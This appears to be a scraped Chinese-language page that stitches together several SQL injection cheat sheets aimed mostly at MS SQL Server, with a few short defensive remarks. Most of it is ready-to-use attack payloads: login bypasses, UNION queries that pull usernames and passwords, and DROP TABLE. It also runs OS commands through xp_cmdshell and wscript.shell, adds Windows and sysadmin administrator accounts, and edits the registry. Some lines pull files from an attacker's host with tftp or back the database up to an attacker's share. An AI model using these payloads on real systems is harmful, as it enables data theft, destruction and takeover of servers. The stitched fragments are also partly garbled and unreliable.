渗透常用SQL注入语句大全

合集下载

sql注入用例

sql注入用例

sql注入用例SQL注入是一种常见的网络安全漏洞,可使攻击者在不正当访问数据库的情况下,执行恶意SQL语句。

为了更好地理解和应对SQL注入漏洞,下面将提供一些SQL注入的常见用例及预防措施。

1. 登录绕过任务描述:通过SQL注入绕过登录验证,并获取管理员权限。

回复内容:SQL注入漏洞能够使攻击者绕过应用程序的身份验证机制,获取未经授权的访问权限。

以下是一个常见的登录绕过用例:假设登录页面的用户名和密码验证的SQL查询语句如下:SELECT * FROM users WHERE username='输入的用户名' AND password='输入的密码';攻击者可以通过在用户名或密码输入框中注入恶意的SQL代码来绕过此验证步骤。

一个可能的注入用例是:输入的用户名:' OR 1=1 --输入的密码:任意密码那么原始的SQL查询语句将会变成:SELECT * FROM users WHERE username='' OR 1=1 --' AND password='任意密码';由于1=1始终为真,攻击者将绕过身份验证并成功登录。

预防措施:使用参数化查询或预编译语句,确保输入的数据被正确地转义和过滤,从而防止注入攻击。

2. 数据泄露任务描述:通过SQL注入获取敏感信息,如用户密码、个人信息等。

回复内容:SQL注入漏洞也可被用于从数据库中获取敏感信息。

以下是一个常见的示例用例:假设应用程序根据用户提供的ID参数从数据库中检索用户信息的SQL语句如下:SELECT * FROM users WHERE id='输入的ID';攻击者可以在输入的ID参数中注入额外的SQL代码,以获取其他用户的敏感信息。

一个可能的注入用例是:输入的ID:1' UNION SELECT username, password FROM users WHERE'1'='1那么原始的SQL查询语句将变成:SELECT * FROM users WHERE id='1' UNION SELECT username, password FROM users WHERE '1'='1';攻击者将获得所有用户的用户名和密码。

sql注入语句大全

sql注入语句大全

sql注入语句大全--是否存在xp_cmdshelland 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')--用xp_cmdshell执行命令;exec master..xp_cmdshell "net user name password /add"--;exec master..xp_cmdshell "net localgroup name administrators /add"----查看权限and (select IS_SRVROLEMEMBER('sysadmin'))=1-- //saand (select IS_MEMBER('db_owner'))=1-- // dboand (select IS_MEMBER('public'))=1-- //public--创建个登陆mssql的帐号;exec master.dbo.sp_addlogin name,pass;----把创建的mssql登陆帐号提升到sysadmin;exec master.dbo.sp_addsrvrolemember name,sysadmin;--有用的扩展--获得MS SQL的版本号//mssql版本execute master..sp_msgetversion // dbo public--得到硬盘文件信息//dbo public--参数说明:目录名,目录深度,是否显示文件//读取磁盘目录和文件execute master..xp_dirtree 'c:' //列出所有c:\文件和目录,子目录execute master..xp_dirtree 'c:',1 //只列c:\文件夹execute master..xp_dirtree 'c:',1,1 //列c:\文件夹加文件--列出服务器上所有windows本地组execute master..xp_enumgroups //dbo--得到当前sql server服务器的计算机名称//获得计算机名execute master..xp_getnetname //dbo public--列出指定目录的所有下一级子目录EXEC [master].[dbo].[xp_subdirs] 'c:\WINNT' //可以列目录--列出服务器上固定驱动器,以及每个驱动器的可用空间execute master..xp_fixeddrives //dbo public--显示系统上可用的盘符execute master..xp_availablemedia //dbo--获取某文件的相关属性execute master..xp_getfiledetails 'C:1.txt' //dbo public--统计数据库里每个表的详细情况exec sp_MSforeachtable 'sp_spaceused ''?''' //查询表//dbo public--获得每个表的记录数和容量exec sp_MSforeachtable 'select ''?''','?', 'sp_spaceused ''?''', 'SELECT count(*) FROM ? ' //dbo pubilc--更新Table1/Table2中note列为NULL的值sp_MSforeachtable 'Update ? Set note='''' Where note is null',null,null,null,' AND in (''Table1'',''Table2'')--列出服务器域名xp_ntsec_enumdomains //机器名//dbo public--停止或者启动某个服务xp_servicecontrol 'stop','schedule' //schedule是服务得名称//dbo--用pid来停止某个执行中的程序xp_terminate_process 123 //123是pid //dbo--只列某个目录下的子目录dbo.xp_subdirs 'C:' //dbo--服务器安全模式信息xp_loginconfig //dboxp_regaddmultistringxp_regdeletekeyxp_regdeletevaluexp_regenumkeysxp_regenumvaluesxp_regreadxp_regremovemultistringxp_regwrite--将新扩展存储过程的名称注册到Microsoft? SQL Server? 上。

常用SQL注入代码

常用SQL注入代码

常用SQL注入代码文章分类:数据库//看看是什么权限的and 1=(Select IS_MEMBER('db_owner'))And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--//检测是否有读取某数据库的权限and 1= (Select HAS_DBACCESS('master'))And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --数字类型and char(124)%2Buser%2Bchar(124)=0字符类型' and char(124)%2Buser%2Bchar(124)=0 and ''='搜索类型' and char(124)%2Buser%2Bchar(124)=0 and '%'='爆用户名and user>0' and user>0 and ''='检测是否为SA权限and 1=(select IS_SRVROLEMEMBER('sysadmin'));--And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --检测是不是MSSQL数据库and exists (select * from sysobjects);--检测是否支持多行;declare @d int;--恢复xp_cmdshell;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select {AT}@version')//-----------------------// 执行命令//-----------------------首先开启沙盘模式:exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD', 1然后利用jet.oledb执行系统命令select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','selectshell("cmd.exe /c net user admin admin1234 /add")')执行命令;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'判断xp_cmdshell扩展存储过程是否存在:http://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')写注册表exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD', 1REG_SZ读注册表exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'读取目录内容exec master..xp_dirtree 'c:\winnt\system32\',1,1数据库备份backup database pubs to disk = 'c:\123.bak'//爆出长度And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--更改sa口令方法:用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'添加和删除一个SA权限的用户test:exec master.dbo.sp_addlogin test,ptloveexec master.dbo.sp_addsrvrolemember test,sysadmin删除扩展存储过过程xp_cmdshell的语句:exec sp_dropextendedproc 'xp_cmdshell'添加扩展存储过过程EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll' GRANT exec On xp_proxiedadata TO public停掉或激活某个服务。

sql注入常见语句

sql注入常见语句

sql注入常见语句SQL注入是一种常见的Web应用程序漏洞,攻击者通过在用户输入的数据中插入恶意的SQL代码来实现对数据库的非法操作。

以下是十个常见的SQL注入语句示例:1. 基本的注入语句```' OR '1'='1' --```2. 利用UNION注入语句```' UNION SELECT 1,2,3 --```3. 利用注释符绕过过滤```' OR '1'='1' /*```4. 利用子查询获取更多信息```' OR 1=(SELECT COUNT(*) FROM users) --```5. 利用时间延迟注入```' OR SLEEP(5) --```6. 利用错误消息获取数据库信息```' OR 1=1; SELECT * FROM users WHERE username = 'admin' --```7. 利用UNION注入获取列名```' UNION SELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = 'users' --```8. 利用ORDER BY注入获取表名```' UNION SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_SCHEMA = 'database' ORDER BY 1 --```9. 利用布尔盲注进行渗透```' OR SUBSTRING((SELECT username FROM users LIMIT 1), 1, 1) = 'a' --```10. 利用堆叠查询进行注入```'; DROP TABLE users; --```以上是一些常见的SQL注入语句示例。

sql注入传入语句

sql注入传入语句

sql注入传入语句SQL注入,指的是利用恶意的SQL语句来攻击数据库系统,盗取或者破坏数据库中的数据。

当用户将一条用户输入的字符串直接拼接入到数据库查询中时,很可能会导致数据库被攻击。

因为这条用户输入的字符串可以改变SQL语句的执行,从而执行用户实际不想执行的操作。

SQL注入最常见的穿越形式是此特性的最大弱点,这种穿越就是所谓的SQL注入。

为了突破Web应用的权限层级限制,攻击者会在 Web表单中植入特殊的SQL语句,以便在提交数据时,攻击者可以借此去突破Web应用的安全限制,获得Desktop access权限。

举例来说,攻击者可以尝试使用SQL注入字符,实施身份认证绕过攻击,以入侵数据库,例如:将“<>”拼接到Web表单中,攻击者可以请求受攻击的系统使用“<>”中的外部变量,从而获得对数据库的访问权限。

另外,SQL注入还可以用于恶意数据修改,某些特殊的SQL语句可以用来修改或者删除数据库中的数据,例如:在一个将用户登录信息存储在一个数据库中的Web应用中,攻击者可以利用SQL注入的技术来删除其他用户的登录信息,这样就可以实现对其他用户账户的控制权。

此外,SQL注入还可以用于窃取敏感信息,攻击者可以使用结合sql语句来窃取数据库中存储的敏感信息,例如用户的账号和密码,或者是商业逻辑中的重要信息,这种利用SQL注入获取数据库中的重要信息经常发生,有时候哪怕数据库在服务器上已经有可见的监测,攻击者也能够成功的获取数据库信息.为了防止SQL注入的发生,最可靠的方式是准确识别用户输入的内容,在获取用户输入的时候要确保内容中不含有任何可攻击内容,然后将用户输入替换为特殊字符,再将其拼接到数据库查询中,另外要尽量将应用用户的权限降到最低级,以限制用户获取数据库中数据的可能性。

最后,还可以通过安装功能完善的WAF来过滤恶意的SQL语句,但是这种防御方式也并不完美,可以作为最后的措施。

sql 注入 常用命令

sql 注入 常用命令

sql 注入常用命令SQL注入是一种常见的网络安全漏洞,攻击者通过在用户输入的数据中插入恶意的SQL代码,从而使数据库执行非预期的操作。

在本文中,我们将介绍一些常用的SQL注入命令,以及如何防止和应对这些攻击。

1. UNION注入UNION注入是一种常见的SQL注入攻击方式,攻击者通过在SQL 查询中使用UNION关键字,将恶意查询的结果与原始查询结果合并,从而获取额外的信息。

例如,攻击者可以使用以下命令获取用户表中的所有用户名和密码:```SELECT username, password FROM users UNION SELECT NULL, NULL FROM information_schema.tables;```防御方法:对用户输入进行严格的验证和过滤,使用参数化查询或预编译语句。

2. SELECT注入SELECT注入是一种利用用户输入的恶意SQL代码来修改查询结果的注入方式。

攻击者可以通过在WHERE子句中插入额外的条件来绕过身份验证或获取敏感信息。

例如,攻击者可以使用以下命令绕过登录验证:```SELECT * FROM users WHERE username='' OR '1'='1' AND password='' OR '1'='1';```防御方法:使用参数化查询或预编译语句,对用户输入进行严格的验证和过滤。

3. INSERT注入INSERT注入是一种利用恶意SQL代码插入额外数据的注入方式。

攻击者可以通过在INSERT语句中插入恶意SQL代码来执行任意的数据库操作。

例如,攻击者可以使用以下命令在用户表中插入一条管理员账号:```INSERT INTO users (username, password) VALUES ('admin', 'password'); SELECT * FROM users WHERE 1=1;```防御方法:使用参数化查询或预编译语句,对用户输入进行严格的验证和过滤。

sql注入的命令格式

sql注入的命令格式

sql注入的命令格式SQL注入是一种常见的网络攻击手段,通过在输入字段中插入恶意SQL代码,攻击者可以绕过身份验证、读取数据库内容、修改数据等。

以下是常见的SQL注入命令格式:1.' OR 'a'='a:这种命令可以让数据库忽略后面的条件,并返回所有数据。

2.'; DROP TABLE table_name;--:这种命令可以删除数据库中的表。

3.'; INSERT INTO table_name (column1, column2, column3) VALUES (value1, value2, value3);--:这种命令可以向数据库中的表插入新的数据。

这些命令只是SQL注入的一部分,并不是所有的注入命令。

而且,这些命令也不能保证在所有情况下都能使用,前提是网站的数据库配置不当,导致了SQL注入的漏洞。

因此,为了防止SQL注入攻击,应该采取一系列的安全措施,例如使用参数化查询、验证和清理输入数据、限制数据库权限等。

同时,开发人员也应该对应用程序进行安全测试,及时修复已知的安全漏洞。

除了上述的几种SQL注入命令格式,还有许多其他的SQL注入命令格式,如下所示:1.' AND 1=1:这是一种经典的注入命令,可以在输入字段中插入恶意代码,使得数据库会忽略后面的条件并返回所有数据。

2.'; DROP TABLE table_name;--:这种命令可以删除数据库中的表。

3.'; INSERT INTO table_name (column1, column2, column3) VALUES (value1, value2, value3);--:这种命令可以向数据库中的表插入新的数据。

4.'; UNION SELECT 1,2,database() ;--:这种命令可以获取数据库的名称。

5.'; UNION SELECT 1,2,group_concat(table_name) from information_schema.tables wheretable_schema=database() ;--:这种命令可以获取数据库中的所有表名。

sql注入攻击的常用方法

sql注入攻击的常用方法

sql注入攻击的常用方法
1. 通用注释:通过添加“--”到SQL查询中终止查询,导致可能被后台程序执行的SQL语句被自动终止,此时接受的是语句的注释版本,外界在查询中添加垃圾数据。

2. OR语句利用:在SQL语句中添加 OR 语句来绕过数据库的安全性控制,利用脚本修改现有规则或将数据返回值更改为真假。

3. 绕过双引号:通过添加“\”特殊字符对输入的内容进行转义,让应用不识别双引号;也就是进行双引号的覆盖,之后应用的参数存在未经过滤的漏洞,这样就可以用SQL进行投入攻击。

如:“select * from user where name\=\"admin\"”
4. 利用拖尾空格:恶意攻击者添加空格字符,让被注入的SQL语句能够正常执行,比如输入“' and1=1 ”,这样可以避免SQL解析器将单引号作为结尾进行解析。

5. 表达式匹配:恶意攻击者会使用正则表达式来拆分SQL代码,使用“%*”模糊查询来替换原始值,利用SQL语句中的操作运算符来添加恶意信息,如:%`' OR 1=1--`
6. 数据库指令:攻击者可以使用SQL语句中的union等指令,来将恶意代码和原始数据库里的信息进行拼接,一旦这种拼接成功后,数据库就可能会被恶意攻击者获取数据。

7. 特殊函数:还有一些特殊的字段,如系统函数,比如“ifnull”、“sleep”、“rand”等,可以让攻击者让被注入的数据库服务器延时执行以达到攻击数据库的目的。

8. 无尽苦读:用一些特殊字符来组合语句,以及多次尝试,来穷举出所有可能性。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。

渗透常用S Q L注入语句大全Document serial number【KKGB-LBS98YT-BS8CB-BSUT-BST108】1.判断有无注入点;a n d1=1a n d1= 22.猜表一般的表的名称无非是adminadminuseruserpasspassword等..and0<>(selectcount(*)from*)and0<>(selectcount(*)fromadmin)—判断是否存在admin这张表3.猜帐号数目如果遇到0<返回正确页面1<返回错误页面说明帐号数目就是1个and0<(selectcount(*)fromadmin)and1<(selectcount(*)fromadmin)4.猜解字段名称在len()括号里面加上我们想到的字段名称.?1 2 3and1=(selectcount(*)fromadminwherelen(*)>0)–and1=(selectcount(*)fromadminwherelen(用户字段名称name)>0)and1=(selectcount(*)fromadminwherelen(_blank>密码字段名称password)>0)5.猜解各个字段的长度猜解长度就是把>0变换直到返回正确页面为止?1 2 3 4 5 6 7 8and1=(selectcount(*)fromadminwherelen(*)>0)and1=(selectcount(*)fromadminwherelen(name)>6)错误and1=(selectcount(*)fromadminwherelen(name)>5)正确长度是6and1=(selectcount(*)fromadminwherelen(name)=6)正确and1=(selectcount(*)fromadminwherelen(password)>11)正确and1=(selectcount(*)fromadminwherelen(password)>12)错误长度是12and1=(selectcount(*)fromadminwherelen(password)=12)正确6.猜解字符and1=(selectcount(*)fromadminwhereleft(name,1)=a)—猜解用户帐号的第一位and1=(selectcount(*)fromadminwhereleft(name,2)=ab)—猜解用户帐号的第二位就这样一次加一个字符这样猜,猜到够你刚才猜出来的多少位了就对了,帐号就算出来了and1=(selecttop1count(*)fromAdminwhereAsc(mid(pass,5,1))=51)–这个查询语句可以猜解中文的用户和_blank>密码.只要把后面的数字换成中文的ASSIC码就OK.最后把结果再转换成字符.1 2 3 4 5 6 7 8 9groupbyusers.idhaving1=1groupbyusers.id,ername,users.password,users.privshaving1=1–;insertintousersvalues(666,attacker,foobar,0xffff)–UNIONSelectTOP1COLUMN_blank>_NAMEFROMINFORMATION_blank>_SCHEMA.COLUMNSWhereTA BLE_blank>_NAME=logintable-UNIONSelectTOP1COLUMN_blank>_NAMEFROMINFORMATION_blank>_SCHEMA.COLUMNSWhereTA BLE_blank>_NAME=logintableWhereCOLUMN_blank>_NAMENOTIN(login_blank>_id)-UNIONSelectTOP1COLUMN_blank>_NAMEFROMINFORMATION_blank>_SCHEMA.COLUMNSWhereTA BLE_blank>_NAME=logintableWhereCOLUMN_blank>_NAMENOTIN(login_blank>_id,login_ blank>_name)-UNIONSelectTOP1login_blank>_nameFROMlogintable-UNIONSelectTOP1passwordFROMlogintablewherelogin_blank>_name=Rahul–看_blank>服务器打的补丁=出错了打了SP4补丁and1=(select@@VERSION)–看_blank>数据库连接账号的权限,返回正常,证明是_blank>服务器角色sysadmin权限。

and1=(SelectIS_blank>_SRVROLEMEMBER(sysadmin))–判断连接_blank>数据库帐号。

(采用SA账号连接返回正常=证明了连接账号是SA)?1 2 3andsa=(SelectSystem_blank>_user)–anduser_blank>_name()=dbo–and0<>(selectuser_blank>_name()–看xp_blank>_cmdshell是否删除and1=(Selectcount(*)FROMWherextype=XANDname=xp_blank>_cmdshell)–xp_blank>_cmdshell被删除,恢复,支持绝对路径的恢复;EXECxp_blank>_cmdshell,xplog70.dll–;EXECxp_blank>_cmdshell,c:\inetpub\wwwroot\xplog70.dll–反向PING自己实验;usemaster;declare@sint;execsp_blank>_oacreate“wscript.shell”,@sout;execsp_blank>_oamethod@s,”run”,NULL,”cmd.exe/cping 加帐号;DECLARE@shellINTEXECSP_blank>_OACreatewscript.shell,@shellOUTPUTEXECSP_bla nk>_OAMETHOD@shell,run,null,C:\WINNT\system32\cmd.exe/cnetuserjiaoniang$1866574 /add–创建一个虚拟目录E盘:;declare@ointexecsp_blank>_oacreatewscript.shell,@ooutexecsp_blank>_oametho d@o,run,NULL,cscript.exec:\inetpub\wwwroot\mkwebdir.vbs-w“默认Web站点”-v “e”,”e:\”–访问属性:(配合写入一个webshell)declare@ointexecsp_blank>_oacreatewscript.shell,@ooutexecsp_blank>_oamethod @o,run,NULL,cscript.exec:\inetpub\wwwroot\chaccess.vbs-aw3svc/1/ROOT/e+browse 爆库特殊_blank>技巧::%5c=\或者把/和\修改%5提交and0<>(selecttop1pathsfromnewtable)–得到库名(从1到5都是系统的id,6以上才可以判断)and1=(selectnamefromwheredbid=7)–and0<>(selectcount(*)fromwherename>1anddbid=6)依次提交dbid=7,8,9….得到更多的_blank>数据库名1 2 3 4 5 6 7 8 9and0<>(selecttop1namefromwherextype=U)暴到一个表假设为adminand0<>(selecttop1namefromwherextype=Uandnamenotin(Admin))来得到其他的表。

and0<>(selectcount(*)fromwherextype=Uandname=adminanduid>(str(id)))暴到UID的数值假设为uid=idand0<>(selecttop1namefromwhereid=)得到一个admin的一个字段,假设为user_blank>_idand0<>(selecttop1namefromwhereid=andnamenotin(id,…))来暴出其他的字段and0<(selectuser_blank>_idfromwhereusername>1)可以得到用户名依次可以得到_blank>密码。

假设存在user_blank>_idusername,password等字段1 2 3 4 5 6 7 8and0<>(selectcount(*)fromwherename>1anddbid=6)and0<>(selecttop1namefromwherextype=U)得到表名and0<>(selecttop1namefromwherextype=Uandnamenotin(Address))and0<>(selectcount(*)fromwherextype=Uandname=adminanduid>(str(id)))判断id值and0<>(selecttop1namefromwhereid=)所有字段?id=-1unionselect1,2,3,4,5,6,7,8,9,10,11,12,13,*fromadmin?id=-1unionselect1,2,3,4,5,6,7,8,*,9,10,11,12,13fromadmin(union,access也好用)得到WEB 路径?1 2 3 4 5 ;createtable[dbo].[swap]([swappass][char ](255));–and(selecttop 1swappassfromswap)=1–;CreateTABLEnewtable(id int IDENTITY(1,1),pathsvarchar(500))Declare @test varchar (20)execmaster..xp_blank>_regread @rootkey =HKEY_blank>_LOCAL_blank>_MACHINE,@k ey =SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\VirtualRoots\,@value_bl ank >_name=/,values=@test OUTPUTinsertintopaths(path)values(@test )–;useku1;–;createtablecmd(strimage);–建立image 类型的表cmd 存在xp_blank>_cmdshell 的测试过程:1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 ;execmaster..xp_blank>_cmdshelldir;execjiaoniang$;–加SQL 帐号;exec null ,jiaoniang$,1866574;–;execjiaoniang$sysadmin;–;execnetuserjiaoniang$1866574/workstations:*/times:all/passwordchg:yes/passw ordreq:yes/active:yes/add;–;execnetlocalgroupadministratorsjiaoniang$/add;–execmaster..xp_blank>_servicecontrolstart,schedule 启动_blank>服务execmaster..xp_blank>_servicecontrolstart,server;DECLARE @shell INTEXECSP_blank>_OACreatewscript.shell,@shell OUTPUTEXECSP_blan k>_OAMETHOD @shell ,run,null ,C :\WINNT\system32\cmd.exe/cnetuserjiaoniang$1866574/add;DECLARE @shell INTEXECSP_blank>_OACreatewscript.shell,@shell OUTPUTEXECSP_blan k>_OAMETHOD @shell ,run,null ,C :\WINNT\system32\cmd.exe/cnetlocalgroupadministratorsjiaoniang$/add;execmaster..xp_blank>_cmdshelltftp-iyouipgetfile.exe –利用TFTP 上传文件 ;declare @a sysnameset @a =xp_blank>_+cmdshellexec @a dirc:\;declare @a sysnameset @a =xp+_blank>_cm’+’dshellexec @a dirc:\;declare @a ;set @a =db_blank>_name();backupdatabase @a todisk=你的IP 你的共享目录bak.dat如果被限制则可以。

相关文档
最新文档